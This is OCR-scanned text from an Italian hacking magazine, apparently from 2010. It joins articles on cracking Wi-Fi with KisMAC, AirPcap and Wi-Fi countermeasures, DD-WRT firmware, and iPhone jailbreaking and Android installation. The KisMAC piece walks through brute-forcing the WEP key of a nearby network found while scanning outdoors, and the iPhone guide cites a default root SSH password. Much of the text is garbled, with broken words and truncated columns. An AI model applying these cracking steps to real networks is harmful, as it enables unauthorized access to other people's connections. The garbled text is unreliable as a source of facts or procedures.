quindi bisogna ricordarsi 
tutto. Ciò significa che 
anche se possediamo 
la chiave WEP 
non possiamo 
accedere 
all'Access 
Point a meno 
che l'indirizzo K 
MAC del 
nostro 
adattatore 





KISMA 




E LA PASSWOBO WhFI i' SEB¥lfA 




Gli utenti Mac sono 
spasso un po' 
discriminati in téma 
di backing. Da una 
parte possono a pieno 
titolo vantarsi di avere 
dei computer poco soggetti a Virus, 
Trojan, Maiware e tutto quanto rientri 
nell'arsenale del perfetto hacker. 
Dall'altra sono, di fatto, sprovvisti loro 
stessi del suddetto arsenale: Ovvero 
non hanno gii strumenti per cercare 
di realizzare qualche piccolo attacco, 
anche solo per testare l'efficacia della 
propria rete o delle difese coil egate- 
Colpa della scarsa diffusione dei 
Mac rispetto ai PC/Windows, 
che rappresentano la stragrande 
maggioranza dei computer in 



commercio e, proprio per questo, 
finiscono per attirare l'attenzione dei 
malintenzionati. Ovvero, la troppa 
popolarità spesso può essere 
anche pericolosa, ma l'isolamento 
non favorisce il proliferare di idee e 
tecniche di sviluppo. Ma questo è 
un discorso fatto già altre volte e un 
po' ritrito. Semmai in questo articolo 
vogliamo segnalare un'eccezione che 
conferma la regola, ovvero un ottimo 
sniffer/scanner wi-fi per Mac che 
rappresenta una valida alternativa a 
Kismet e altri scanner disponibili in 
ambiente Windows/Linux: KisMAC. 
KisMAC è completamente gratuito, si 
può scaricare all'indirizzo http://trac. 
kismac-ng.org. Funziona benissimo 
coi portatili dotati di scheda airport 



A 



Cdme trovare 
la password 
di accessi 

INTERNET WhFI 
PROTETTI IN 
POCHI SEMPLICI 
MOSSE.. . 



integrata che consentono di spostarsi, 
in piena mobilità, alla ricerca di reti 
wi-fi attaccabili. Per testare l'efficacia 
di KisMAC abbiamo provato a 
utilizzarlo in ambiente esterno, con un 
MacBook Pro che Si è trasformato in 
un potente scanner portatile. 



QUALCHE 
SETTAGGIO 



Prima di iniziare il nostro attacco 
dobbiamo selezionare i driver della 
scheda Wi-Fi integrata attraverso il 
pannello delie Preferenze [Figura 1). 
Nel nostro caso si tratta di una scheda 
Airport Estreme. 



ir 
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INIZIAMO 



La versione utilizzata è fa O.3.S. Una 
volta lanciato KisMAC mostra la finestra 
principale ohe risulta assolutamente 
vuota (Figura 2). La nostra attività di 
scanning di pacchetti Wi-Fi, owero di 
intercettazione di pacchetti dati che 
transitano attraverso una rete wireless, 
non è ancora iniziata. Per avviarla 
dobbiamo premere Start Scan, nella 
parte inferiore destra della finestra 
principale. La manopola ancora più a 
destra inizierà una sorta di impercettibile 
movimento rotatoria Segno Ohe 
KisMAC Sta lavorando per voi! 
foia prima di attivarsi KisMac chiede 
di autenticarsi come amministratore 
(Figura 3). 



DATI DO PO DATI 



KisMAC individua tutte le reti Wi-Fi nel 
raggio di azione della scheda Airport 
integrata e inizia a fare lo scanning 
dei pacchetti dati. Il nome delle reti 
disponibili appare nella colonna 
SSID. Qui per ovvi motivi li abbiamo 
cancellati. L'attività di raccolta dati 
deve procedere per diversi minuti. 
Infatti, per potere cercare di portare 
un qualsiasi tipo di attacco bisogna 



collezionare un quantitativo minimo di 
pacchetti dati, 



UN ATTA □ G □ 
DI PURA "FORZA 
BRUTA" 



Come si può notare dalla nostra 
schermata {Figura 4) sono State 
individuate diverse reti, alcune con 
chiave di protezione WEP, altre con 
chiave di protezione wpa e WPA2. 
Evidentemente le reti WEP sono più 
vulnerabili ed è proprio su queste che 
concentreremo il nostro attacco, Dopo 
diversi minuti di intercettazione di 
pacchetti dati possiamo verificare se 
abbiamo elementi sufficienti per sferrare 
il nostro primo attacco. Proviamo a 
selezionare una rete Wi-Fi [tra quelle 
WEP) dal menu Network e proviamo a 
portare un attacco di pura forza bruta, 
owero un tipo di attacco che cerca di 
scovare la password forzando centinaia 
di combinazioni di lettere e parole al 
secondo. 



NetYiork>BryteforceH]lphanunts 
agninst 40- bit 

In O|uesto caso abbiamo scelto un 
attacco in grado di rivelare una 




smpletemente gratuito, si può scaricare all'indirizzo 
isniac-ng.org. 



password alfanumerica a 40 bit 
{Figura 5). 

Se la quantità di dati è insufficiente 
per sferrare l'attacco comparirà un 
avviso ohe informa l'utente come sia 
necessario acquisire più dati prima 
di procedere. L'attacco può durare 
diversi minuti, la scansione viene 
visualizzata su una barra che si colora 
progressivamente di azzurro (come 
Si pud osservare dalle figure 6 e 7 
presenti nella pagina successiva). 



LA PASSWORD 



Dopo circa un'ora KisMAC ha svelato 
la password di una delle reti WEP 
(Figura 8). Basta selezionare il pannello 
Proprietà (premendo il pulsante a forma 
di ingranaggio nella parte inferiore della 
finestra) per visualizzarla in ^[rispondenza 
della riga ASCII Key, Nel nostro caso 
era una banalissima password di soie 
c ìique lettere, senza numeri, praticamente \ 
una delle password che gli esperti di 
sicurezza giudicano molto debole, In 
genere sì consiglia di inserire non solo 
lettere ma arche numeri e di aumentare 
sensibilmente la lunghezza complessiva 
della password per aumentare il numero 
di combinazioni da forzare in un attacco 
"brute force". Naturalmente nella 
schermata abbiamo cancellato tutti i dati 
relativi alla rete Wi-Fi utilizzata per la nostra 
dimostrazlone- 

Nelfca pagina seguente trovate le 
schermate di tutto l'attacco con le relative 
descrizioni passo dopo passo, 
Buono "snifferà tutti! 
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Hopping FrEquency: 



y' Figura 1: Prima di inaiare il nostro attacco dobbiamo 
W^É selezionare i driver della scheda Wi-Fi integrata. 



Figura 2: 
Per avviare 
lo scanning 
dobbiamo 
premerà 
Start Scan, 
nella parte 
inferiore destra 
della finestra 
princìpate- 



Figura 3: Prima di attivarsi Ki-sMac chiede di autenticarsi 
come amministratore. 



igura 5: Selezioniamo dal menu: Network>Bruteforcei> 
alpn;nums against 40-bit. 
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Figura 5: L'attacco può durare diversi minuti.. 



I*T» a uova ; Cu, ci . 

MI lungcd ù H TI '.li U.W. A Ibi 3 0} )fr 1* '4 # 

wtr R inpn n ra il zkj cu ino zoli-to-hmì»» * « 

'.. t j;jb iDL] DI IJ LI 16 19 4 

HW 0 » » U* W.WKU ÌCL] Ui UiUtlJ.i a 

MA) iMUBfd D II M 7DU LU-niU*(ll >T « 



F;gura 7: ...la scansione viene visualizzata su jna barra che 
sì colora progressivamente dì aizumj. 



Figura 8: Dopo circa un'ora KisMAC ha svelato [a password 
di una delle reti WEP. 
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E notizia di questi giorni, 
durante ta stesura di 
questo articolo (novembre 
2010) che il Consiglio 
dei Ministri ha dato 
via libera a diverse 
misure contenute in un decreto 
legge : dalla possibilità' di espellere 
^0 Cittadini comunitari alla stretta contro 
W^ji* prostituzione e accattonaggio alla 
rf"*^ liberazione delle reti wi-fi . In questo 
caso, mi sento in dovere di dire 
che non sono molto d'accordo, 
3S Liberalizzare le reti wi-fi significa 
inanzitutto rendere "anonima" ogni 
connessione ad internet, e proprio 
perché anonima, ci troveremo di 
_^ (rome ac' una sene 0 reati a cui non 
potremmo icer.t-ficare A colpevole. 
"jjjjjp, E' pur vero che anche oggi c'è la 
possibilità di commettere reati su 
|WP* intemet senza sapere l'autore, ma 

son convinto che dai 1 gennaio £011 
HH questi reati si moltiplicheranno a 

dismisura. Ma questo non è il peggio 
.... Si può verificare che colui che 
commette un reato informatico, 
lo fa sfruttando il vostro roufer o 
TOswìw access P°' nt ss mn configurato 

correttamente, in questo caso potrete 
ftttBea trovarvi la polizia postale alla porta 
^Stìftj senza che voi ne sappiate niente, 
poiché lascerà come "biglietto da 
^ visita" il vostro Indirizzo IP, che è un 
^tHÈt mmsro univoco che corrisponde 
alla vostra persona. I reati sono 
molteplici, anche se la maggioranza 
dar Casi riguarda il furto di denaro, Non 
tralascerei i reati a contenuto sessuale, 
perdi più, pedo-pornografico. In alcuni 
casi, sfruttando Skype, un programma 
che permette di telefonare via internet, 
gli scenari potranno essere ancora più 
complessi. 



TROVARE 
UN ACCESS. POI NT 
LIBERO 



Trovare un access point libero è 
facilissimo, non bisogna essere 
hacker ne essere afferrati ssi mi in 
materia. Ogni utente di pc portatile 
avrà sicuramente provato a vedere 
o scavare le connessioni attive della 
sua zona, e molto spesso, oltre alla 
propria, ne avrà trovato anche altre: 
alcune opportunamente protette. 





altre.., libere. Sfruttare le connessioni 
altrui, è reato, ma a volte ci si lascia 
prendere dalla curiosità e.,., questo 
non va bene. Addirittura in alcune 
città, vengono segnalate con vernice 
spray sui muri degli edifici , il punto 
ottimale per raggiungere una rete 
libera wi-fi. Con la nuova Legge, 
molto probabilmente, non ci sarà più 
bisogno. 



SCOPO DI QUESTO 
ARI 



Ovviamente, come detto in 
precedenza, lo scopo di questo 
articolo è quello di verificare se la 
vostra rete sìa protetta al punto giusto. 
Proteggere una rete al 100 per 1 00 
non è semplice, se non impossibile, 
Bisogna inanzitutto conoscere il 
.malintenzionato ed il suo grado di 



violare un sistema semplicemente 
per il gusto di farlo, e più è difficile, 
più gusto ci provano. Saltando la 
fase che permette di proteggere il 
vostro router. iniziamo a conoscere un 
dispositivo interessante per verificare 
la protezione, l'analisi, e la risoluzione 
dei vostri problemi, 



AIRPCAP NX 



Dalla CACE Technologies, azienda 
americana ma con ii 70 per 100 di 
personale italo-americano, abbiamo 
provato un kit che comprende una 
parte hardware ed una software per 
verificare la sicurezza della vostra 
rete o access-point wi-fi. La parte 
hardware consiste in un adattatore 
usb che funge da ricetrasmettftore con 
possibilità di attaccarci le due antenne 



iff.iii»< 



«li»» 



conoscenza delle reti. Molto spesso, 
per esperienze personali, abbiamo a 
che fare con dei LAMER, Un lamer è 
un aspirante cracker con conoscenze 
informatiche limitate. Il termine inglese, 
usato in genere in senso dispregiativo, 
potrebbe essere l'equivalente 
in italiano di " principiante". Da 
qui, proteggere anche in maniera 
approssimativa un access point, può 
risultare utile. Ma non sempre è COSÌ, 
esistono anche persone capaci dì 



interne) per migliorare le prestazioni in 
ambienti più esigenti. La possibilità 
di gestire due bande di frequenza 
(la 2,4 e la 4,9 ghz) rende questo 
adattatore universale. La particolarità 
che invece lo rende unico nel suo 
genere, è la possibilità di iniettare dei 
pacchetti preconfezionati nella rete 
by-passando lo "stack" di controllo. 
Questa tecnica è molto usata tra gli 
hacker, permettendo loro di introdursi 
nei sistemi informatici molto più 
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pc recente siamo in grado di farlo in 
mero di 10 minuti. Una volta raggiunto 
il numero necessario delle chiavi, 
cliccate su "analize" scegliendo uno 
tra i 2 modi proposti per decrittare la 
chiave. 

A questo punto attendete il risultato 
che arriverà entro pochi secondi. 

CONTROMISURE 



«fi! 



La prima contromisura da prendere 
per rendere sicura una rete, è quella 
di essere invisibili- Non inserite 
nomi riconducibili a voi nella parte 
riguardante l'identificazione della 
rete. Inserite nomi strani o parole 
senza senso e non fate l'errore ohe 
la maggior parte degli utente fa, 



inserendo nome e cognome. Più 
anonimi si è meglio è. Seconda cosa, 
configurare in modo opportuno il 
vostro router, cambiando innanzitutto 
le credenziali di default per l'accesso. 
La maggior parte dei router o non 
hanno la password o è "Admin". 
Fatto questo è buona regola abilitare 
l'accesso alla vostra rete abilitando il 



filtro del MAC Address dei vostro PC. 
In questo caso avete ottime possibilità 
di protezione, anche se ad un vero 
hacker basta una sola riga di codice 
(in linux) per scavalcare la protezione, 
(spoofìng). Successivamente potrete 
disattivare il SSID broadcast, 
disattivare il "server dhcp" .attivare 
i nuovi sistemi di crittografia, quali 
WPA e WPA2, cambiare la gamma di 
>ndirizz IP stand£rd(132. 168.1.1). Un 
ultima cosa, anche se sembra banale, 
NON lasciarte il router acceso quando 
non viene utilizzato. 



□ □NCLU5IDFMI. 



Abbiamo visto in questo articolo 
come sia facile penetrare nelle 
connessioni wireless. Tuttavia, 
esistono molte protezioni in merito 
che creano la vita difficile ad un 
eventuale intruso. La rete wireless 
non è sicura per niente, bisogna 
avere la fortuna di non trovare un 
"appassionato" o una persona 
in gamba che abbia voglia di 
accedere alla vostra rete per il 



solo gusto di farle 
un'arma a doppio 
un ottimo strumei 
esplorare le regol 



TER 
UTILI 



SSID (service set 
identificativo che 
distinguere un ac 
WEP (Wired Equii 
algoritmo ideato | 
dei dati nelle reti 
basandosi su una 
condivisa. 
IV (initialization Vi 
pacchetto wep e 
combinazione coi 
per crfptare I dati 
Access Control): 
che identifica in r 
ciascun compone 
AP (access point) 
alla rete solitamei 
un roti ter (hardwe 
può essere anche 
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Router, Access Point 
e simili sono forse i 
dispositivi più venduti in 
assoluto: ne sono pieni 
i negozi specializzati e 
persino ì supermercati. 
La maggior parte degli utenti resta 
perplessa davanti alla scelta di 
dispositivi perché tutti sembrano 
uguali Ira loro e persino i prezzi sono 
molto simili. Per esempio, a parità di 
prestazioni, ia differenza di prezzo 
tra un Repeater e un Access Point 
difficilmente supera i 10 euro. Dal 
punto di vista dell 'hardware, invece, è 
inutile cercarle: non ci sono differenze 
pratiche. Eppure, per questioni di 
marketing, i produttori distinguono 
questi accessori e difficilmente un 
Access Point potrà essere usato come 
Repeater perché ii software intemo 
non lo permette. Lo stesso vale per le 
potenze di trasmissione: per rispettare 
le leggi, i produttori le iimltano via 
software, anche se (magari) il nostro 
router funzionerà in un'area totalmente 
privata, in cui possiamo decidere 
autonomamente questa impostazione. 
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ALTERNATIVA 



Un'alternativa al sempre limitato 
firmware fornito dai produttori è DD- 
WFfT p un firmware Open Source basato 
su Linux che negli utìimi tempi è arrivato 
a supportare pienamente oltre 200 
dispositivi WLAN. Il meccanismo è 
abbastanza semplice: ogni hardware 
mette a disposizione diverse funzionalità 
che vengono raccolte in un framework 
su cui è installata una distro di Linux 
creata per gestire ogni possibilità 
offerta da ogni router. In questo modo, 
il framework rende uniforme l'ambiente 
in cui agisce Linux, mettendo a 
disposizione degli utenti una interfaccia 
comune per diversi dispositivi e un set 
completo di funzionalità che possono 
sfruttare totalmente "hardware delia 
appfianoe utilizzata, Pensiamo, per 
esempio, di avere due router; il primo 
che integra uno switch, un apparato 
WLAN e un firewall maitre il secondo 
è un semplice Access Point che 
dispone solo di una interfaccia di rete 
e un apparato WLAN, Installando DD- 



FlRMWARE PROPRIETARI. ADDIO. 
L'DFEN SOURCE E IL 
FUTURO DI QUALSIASI APPLIANCE. 



WRT su entrambi i dispositivi, questo 
agirà sul primo permettendoci di 
configurare sia la parte WLAN che il 
firewall e lo switch, mentre sul secondo 
agirà solo sulla WLAN. Il tutto Con una 
interfaccia, però, identica. L'accesso 
alla configurazione avviene tramite un 
normale browser, non vengono richiesti 
driver (ovviamente) o programmi di 
configurazione aggiuntivi. Inoltre, 
essendo un firmware Open Source 
usato Su tanti dispositivi differenti, la sua 
stabilità è ormai più che consolidata: 
attualmente ci sono professionisti che 
installano metodicamente DD-WRT 
perché dà ampie garanzie di buon 



firmware proprietari. 




Funzioni 

■ Pio di 200 dispositivi supportati 

■ Il massimo delle funzioni 
disponibili sull'hardware su cui 
viene installato 

• Supporto di tutti gli standard 
WLAN correnti, dove ["hardware è 
adatto: 802.1 1a/b/g/n 

■ integrazione delle funzioni VPN 

■ Integrazione di vari sistemi di 
hotspot 

• Gestione della banda utilizzata 
dai ciient 



Il firmware è specifico. Versioni 
diverse delia siesso hardware 



funzionamento, a frante di firmware 
nativi sviluppati spesso in fretta e senza 
un'accurata fase di debug. 



U PERA DE 
SEMPLICE 



Per installare DD-WRT basta andare 
sul sito di riferimento del progetto 
(www.dd-wrt.com) e cliccare sulla 
voce Download, Por bisogna cercare la 
propria apptiance tra quelle proposte 
e Cliccare sul modello acuì vogliamo 
cambiare firmware. A questo punto ci 
varranno proposte diverse versioni di 
firmware da scaricare, adatte a varie 
esigenze di installazione. Quella più 
semplice da usare è la mini-build con 
installazione via Web ma. a seconda 
dell'appliance, potremmo dover 



installare una versione che fa l'upgrade CJ-Jr" 
via TFTP. Spesso, nell'elenco vengono 
incl use anche version i pre configurate jsjàs i e 
per application i specifiche, come i I 
supporto già attivo al VOIP oppure ai 
servizi desia XBox. Una volta scaricato 
Il firmware adatto occorre coliegarsi 
ali 'interfaccia di aggiornamento della S5§a 
nostra appliance (le modalità variano da 'if.fS 
appliance ad appliance) ed applicare ' 
DD-WRT come se fosse un normale 
update. A questo punto, l'appi iance si Possisi 
riawierà e potremo controllarla tramite connes 
nostro nuovo sistema. Prima di 



configurarla a dovere, magari aiutandoci 
con il forum presente su! sito oppure servlzic 
con l'help integrato, spendiamo un che ci c 

po' di tempo a controllane le varie 
funzioni che DO-WRT ci mette a 



disposizione perché sono Spesso 

nettamente diverse da quelle fomite oom) o| 

dal firmware nativo. Per esempio non delia pr 

è raro trovare che gli Access Point anchori 

LinkSys usano nativamente una inoltre, 

potenza di trasmissione non superiore di rete i 

al 70%, mentre DD-WRT ci permette anche ! 

di portarla ai 1 qq%, ampliando il loro WAN. \ 

raggio d'azione. Allo stesso tempo è essere 

abbastanza comune che un Access hardwa 

Point possa funzionare come Repeater dello sv 

ma anche che un Repeater possa Ittwb' 

trasformarsi in un Access Point! ii pieno 

Tra le varie opzioni, inoltre, avremo al di là i 

a disposizione dei col legamenti con produtt 

servizi estemi che ci permetteranno di da spei 

semplificarci notevolmente la gestione dei firm 

della nostra rete anche i remoto, come il disposi 



_ 
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USI 












Possiamo anche applicare filtri alle 
connessioni in arrivo all'appliance, 
tìisaf/intando protocolli specifici. 



servizio No-IP {www.nO-ip.com), oppure 
che ci consentiranno di dedicare in 
parte o totalmente la nostra banda 
WLAN a sistemi di Hotspoi già esistenti 
Come il noto Sputnik (www .sputnik, 
oom) oppure a sistemi di protezione 
della privacy come AnchorFree (www, 
ariChOrfree.com). Su molte appliance, 
inoltre, potremo assegnare interfacce 
di rete delia parie switch a una DMZ, 
anche se non disponiamo di una porta 
WAN. Viceversa, la porta WAN potrà 
essere usata, in funzione delle capacità 
hardware, come una normale porta 
dello SWitCh. insomma: DD-WRT è un 
firmware che ci permette di prendere 
il pieno controllo del nostro hardware 
al di là delle limitazioni imposte dai 
produttori e. viste le sue capacità, c'è 
da sperare che un domani ci saranno 
dei firmware simili per qualsiasi 
dispositivo, Think open! 
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router con DD-WRT possono funzionare in diverse modalità, in funzione deH'hardwaredispDi 
esto piccclo elenco aiuta nello scegliere la modalità cornetta per le nostre esigenze. 

Point - Il metodo classico di funzionamento: una LAN cotlegata all'appliance, una rete WAN con dei eli 
Serve per trasformare l 'appliance in una specie di scheda wireiess, Che mette in comunicazione un computer 
:o via LAN a un Access Point. il caso tipico di utilizzo è quando il segnale delle normali schede di rete risuStan 
deboli per essere utilizzate pereollegare un computer ed è preferibile usare un'apparecchiatura più potente. 
Bridge - Simile al Client, viene usato quando non si collega un computer ma una rete cablata formata d 
ispositivl. Il caso più frequente di util zzo è quando da un Access Pomi distribuiamo la nostra connessione a 
Bti LAN autonome (i.e.: i! vicino di casa). Noi avremo un Access Point e lui un Client Bridge. Se lui vorrà avere act 
lireless. però, dovrà avere un suo Access Point perché il bridge non gli permetterà la connessione dai client 
Hoc • Un tipo di collegamento che avviene tra due dispositivi Che sono collegati esclusivamente in modalità 1:1 
trambl "AdHoc"). Poco usato se non per connettere segmenti di reta cablata attraverso ponti radio 
aster ■ Permette di ricevere il segnale Wireless di un Access Point e di ripeterlo nell'area attorno all'appliance. 
le per estendere il raggio d'azione di un Access Point ma comporta il dimezzamento della banda disponibile dopo la 
petizione. Viene, comunque, usato quando si condividono connessioni a Internet perché la appliance interessata non 
"cessita di alcun collegamento di rete cablata, basta una presa di corrente. 

•r Bridge - Funziona come il repeater ma viene usato per mettere in comunicazione due segmenti di rete. Viene 
r prolungare il raggio d'azione di una rete wireless in modo da arrivare al segmento successivo. 



m 

m 
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□VVERQ LA GUIDA PRATICA 
PER INSTALLARE ANDROiD SU 
UN IPHONE 3G. NATURALMENTE 
JAILBREAKKATD. 




Per prima cosa occorre procurarsi 
i seguenti si ru menti : 



• iPhone1,2_3.1.3_7D11_Restore. 
ipsw (se volete passare ad OS 



Certo grazie ad Openlboot 
avremo la possibilità di avere 



• iRscovcry ( Per Windows ) n 

Adesso è possibile collegare ''Wl 
J'iPhone al computer e metterlo i« 
modalità Recovery. Per mettere] 
l'iPhone in modalità Recovery | 
basta semplicemente collegarlc 
al proprio Computer e quindi | 
schiacciare contemporaneamente 
il tasto "Home" owero il tasto J 
centrale dell'iPhone e il tasto | 
^Spegni/Accendi" ovvero il tasto] 



:erc "1 
arlo ■ 
"nente 

isto 1 




chiamandola "firmware" in modo j 
che il risultato sia così " 



PllgBllliW^l-W^lIlW-fp-^-lPl 



Nome utente : mot 
Password : alpine [ è la password 
di default di OpenSSH 



Bene adesso siamo dentro 
seguiamo questo percorso 
spostandoci tra le cartelle 



aperto il terminale daremo questi 
comandi 



ed Scrivania ( ci spostiamo sul 
Desktop ) 
od estrazione ( ci Spostiamo nella 
cartella estrazione ) MI 



chmod +x 
cstractiontechniqueO.2 .sh 



e ci ritroveremo fn una condizione 
come nell'immagine in figura. 



Che copieremo anche dentro 
ia cartella "idroid". Alla fine il 
risultato deve essere questo 



dove in questa cartella firmware 
inseriremo i nostri 3 driver che 
abbiamo estratto poco fa (sd8686. 
bin , sd86B6_heiper.bin , zephyr2. 
bin ) . 



Bene siamo giunti agli ultimi 
passaggi adesso ricordale 
all'inizio della guida quando vi WÌ 
avevamo fatto mettere in modalità 
Recovery i'iPhone? Ecco, ora l^p 
dovrete di nuovo eseguire quella 
procedura. 

Una volta messo in modalità 
Recovery apriamo il terminate di 
Ubuntu e digitiamo 
ed Scrivania ( con questo 
comando ci sposteremo su 
Desktop ) 




IH 
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Vi 



ci ritroveremo ir una situazione 
dove le stesse stringhe stampate 
nel terminale appariranno 
contemporanemante suiriPhone 
come in figura 



J. MWMW ■ ■* ' 
■ fi 1 , «un ■■ Ih 5. *ta • 3H. wft» ■ IH*, i-i--- < - li, I 



lff J. ■ ^. ■-*« • imi. wh«h - t>. pwnàlKn 

- ih m. m>< ■ it«. ■ ::ti. w^u - u, 

IH tt, *t> ■ U!. urto • 21. Monito - I. nn'f" 



rut» tir :lt» X 



.ù-f li >l aw 



Se siete arrivati allo stesso 
risultato (ottimo) digitiamo rultimo 
comando: 





T 


:i stamperà una serio di stringhe] 
;ome questa _L1 .,; — Lil 














Qui finisce ia mia guida per 
qualsiasi problema o informazìonBj 
scrivete alia redazione o passate 
direttamente al blog dell'autore 





s 


sa 






[Se lascerete qualche commento v 
[verrà risposto in tempi brevi. !■ 
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Golden Master 

■ 



Qualcuno già li cono- 
scerà, per gli altri 
diventeranno presto 
familiari, dato che 
i ragazzi del Dev 
Team dopo aver sbloccato in 
passato gli i Priorie dalla prima 
alla terza generazione, ai sono 
occupati rapidamente di rimuo- 
vere ii blocco anche da iOS 4, il 
sistema operativo dell'iPhone 4. 
Pochissimo tempo dopo ii 
rilascio del sistema operativo, 
hanno infatti reso disponibile nel 
loro blog (http://blog.iphone-.rJev. 
org) l'aggiornamento di Pwna- 
gcTool uno strumento in grado 
di modificare il firmware originale 
per permettere di aggiornare 
iPhone 3G e 3GS già sbloccali 
alla nuova versione di iOS 4 sen- 
za perdere precedenti sblocchi. 
Lo sblocco in questione riguarda 
la possibilità di installare ap- 
plicazioni liberamente eviene 
chiamato candidamente "Jailbro- 
ken", ossia "gabbia rotta". 
Vediamo cosa si deve fare! 




ite todayl 



CRACKING 
COME AVERE 

iDS 4 su 
i Phdne 

3GS SENZA 

i blocchi di 
Apple. 



è lo smartphone più 
mondo. Peccato che iO 
' troppo chiuso per chi 
ma aprire i giocattoli 
tiare diversBmBnte! 



REQUISITI 

Come premessa dovuta, ricordia- 
moci che modificare il firmware del 
telefonino in modo non ufficiale può 
invalidare la garanzia ed è bene che 
tale operazione venga comunque 
fatta solo se ci si tende bene conto 
di cosa stiamo facendo. 
Detto Ciò, al momento Pwnage- 
Tool 4.01 è disponibile solo per 
Mac (con OS X 10,4 +), mentre per 
Windows (XP/Vista/Seven) dovre- 
mo aspettare l'ulteriore sviluppo di 
snOwbreeze (http://iri8sn0w.com) 
ohe permette di avere il firmware 
Jailbroken, ma non supporta anco- 
ra iOS 4. 

Va detto subito che iPhone 2G e gli 
iPod Touch di prima generazione 
non sono al momento supportati 
dai tool. Sono invece supportati; 
gli iPhone 3GS che abbiano già a 
bordo un firmware "Jailbroken" e 
con bootrom più vecchio [per ca- 
pirci, se avete iBoot-359.3.2 o suc- 
cessivi non avete per ora alcuna 
possibilità perché con quell'aggior- 
namento Apple ha chiuso la falla 
che permetteva di generare uno 
stack overflow al boot del termina- 
te; stessa storia se avete un iPod 
Touch di seconda generazione con 
numero di Serie che comincia con 
"MG" o un iPod Touch 3G; 
gli iPhone 3G e iPod Touch con 
firmware 3.0 e 3.1 .2 sui quali si 
può agire tramite un altro tool del 
Dev Team chiamato redsnQw 0 9.S 
BETA (http://wikeciphwn.org/ 
howto:rs9) Che gira sia su Windows 
che Mac. 

Per sapere che versione di iBoct 
abbiamo possiamo usare l'utile 
tool i Detector (http://ih8sn0w.com/ 
index.php/products/view/idetector. 
srtow). 

Ovviamente poi il tool non può 
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funzionare se il terminale è stato 
già aggiornato in modo standard a 
ÌOS4! 



ROMPIAMO LA 
GABBIA 

Supponendo di avere un iPhone 
3GS sul quale sperimentare il tool 
del Dm Team, scarichiamo l'ultima 
reiease di iOS4 adatta al nostro te- 
lefonino. Abbiamo due possibilità: 
googliamo "iOS 4 download links" 
e scegliamo tra i numerosi risultati 
oppure col leghiamo il 3GS al Mac 
con il cavo usb e richiediamo il 
download via iTunes, senza instal- 
lane o aggiornare nulla (fondamen- 
tale!) 

Poi prima di proseguire facciamo 
un bel backup con iTunes seguen- 
do le indicazioni di Apple (http:// 
support.apple.com/kb/HT17BS). 
PwnageTool è stato creato per 
modificare il firmware ufficiale 
fj Phone2,1 _4.D_8A293_Restore. 
ipswj creandone uno modificato 
(patchato) proprio nella parte di 
booti questa modifica permette 
di evitare che il terminale compia 
dei controlli sull'autenticità del 
firmware e possa essere possibile 
cosi evitai? i blocchi presenti nel 
codice dato che aggiungeremo altri 
pacchetti software, non autorizzati 
(chissà perché!) da Apple. 
Installiamo PwnageTool e verrà 
creata un'icona che serve per lan- 
ciare il programma. Clicchiamoci 
sopra e aspettiamo che il program- 
masi carichi e visualizzi il men u 
con 4 icone: selezioniamo l'icona di 
Einstein per impostare la modalità 
avanzata Ci verrà quindi richiesto 
di indicare quale terminale voglia- 
mo connettere tra ìPhone 3GS e 
IPad Touch 2G. Selezioniamo 3GS 
e ci verrà chiesto ora di selezionare 
il firmware: indichiamo il path del 
file ipsw. 

Siamo pronti ora per "personaliz- 
zare" il nostro firmware: clicchiamo 
su "General" e possiamo scegliere 
di impostare "Adivate the priorie" 
se utilizziamo un gestore telefonico 
diverso da quello che ci ha venduto 
l'iPhone (altrimenti lasciamo l'icona 
de-selezionata). 

In "Cydia $ettings"clicchiamo su 
"Download packages" e premiamo 



Scarichiamo dal site dal 
Dev Team PwnageTool 
direttamente in una cartella 
"Pwnage" sul desktop. 



Per ora il software 
supporta solamente 
iPhone 3gS e IPad 
Touch 2C. 





Dopo aver selezionato 
tutti l pacchetti che ci 
interessano possiamo 
procedere con la 
creazione dei firmware 
modificato 



lì processo di 
creazione del nuovo 
firmware può essere 
lungo, arrivando 
anche a 45 minuti. 



il pulsante Refresh. Selezioniamo 
poi i pacchetti che ci interessano 
(es. OpenSSH e OpenSSL) e accet- 
tiamo cliccando sulla freccia blu. 
Clicchiamo ora su "Seiect Packa- 
ges" poi "Seiect AH" e di nuovo 
sulla freccia blu. 
In "Custom Packages Setìjngs" 
clicchiamo dinettamente sulla 
freccia blu. In "Custom logos 
settings" abbiamo la possibilità, se 
ci interessa, di cambiare I loghi vi- 
sualizzati durante il boot e durante 
il riprìstino del terminale. Per chi 
vuole disegnarsele, le dimensioni 
sono 320x480 e va impostata la 
scala di grigi in RGB. 
Ora possiamo cliccare su "Build" e 
attendere la creazione del firmware 
modificato. Ci verrà chiesto il nome 
da dare al file e ci vorranno poi 
circa 10-30 minuti perché si com- 
pleti n processo a seconda della 
configurazione scelta. 
Quando il firmware patchato è 
stato creato, il software ci chiede 
l'autorizzazione per mettere l'iPho- 
ne in modalità ripristino (Recovery 
mode): diamo ok e connettiamo 
l'iPhone da spento. A questo punto 
premiamo e teniamo premuti il 
tasto Home s quello di Sleep/ 
Wake finché lo schermo diventerà 



tutto bianco (dopo circa 5 secondi). 
Lasciamo quindi solo il pulsante di 
Sleep/Wake, mantenendo premuto 
il tasto Home finché lo schermo 
diventerà tutto nero. 
A questo punto iTunes ci avviserà 
con un messaggio che ha rilevato 
un IPhone in modalità di ripristino. 
Diamo ok e il nostro iPhone è pron- 
to per l'aggiomamento, 
A questo punto dobbiamo proce- 
dere con molta attenzione: tenen- 
do premuto i! tasto Alt/Options 
premiamo sui pulsante "Restare", 
Questo è il punto più delicato di 
tutto il processo: se non teniamo 
premuto Aft/Options ci ritroveremo 
l'iPhone aggiornato a iOS 4, ma 
completamente bloccato e sen- 
za possibilità di tornare indietro. 
Invece tenendolo premuto ci verrà 
chiesto il percorso del firmware 
Che vogliamo flashare. Selezio- 
niamo il nastro firmware persona- 
lizzato e attendiamo che iPlìone 
si occupi del trasferimento che 
durerà altri 10 minuti. 
Una volta flashato, avremo un 3GS 
con iOS4 Jailbroken, pronto per 
tutte le nostre sperimentazioni! E 
non dimentichiamo di ripristinare il 
backup fatto prima, cosi da tornare 
immediatamente operativi, 



GAMES/MEDIO 
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da 

vi? 



e modifiche hardware sono 
da sempre un elemento che 
viaggia di pari passo con le 
con solo, grazie all'aggiunta 
di chip particolari è, infatti, 
possibile consentine alle console di 
riprodurre DVD masterizzati cosa 
altrimenti impraticabile. 
A diro il vcnj: la pratica della modifica 
hardware è un po' fastidiosa, 
bisogna separarsi dall'amata console 
per qualche tempo, non è facile 



soprattutto, decade irrimediabilmente 
la garanzia 

Proprio per questo risulta piuttosto 
interessante la modifica !< SOÌO software" 
che è applicabile alla console Wii e che 
consente, al fermine della stessa, di 
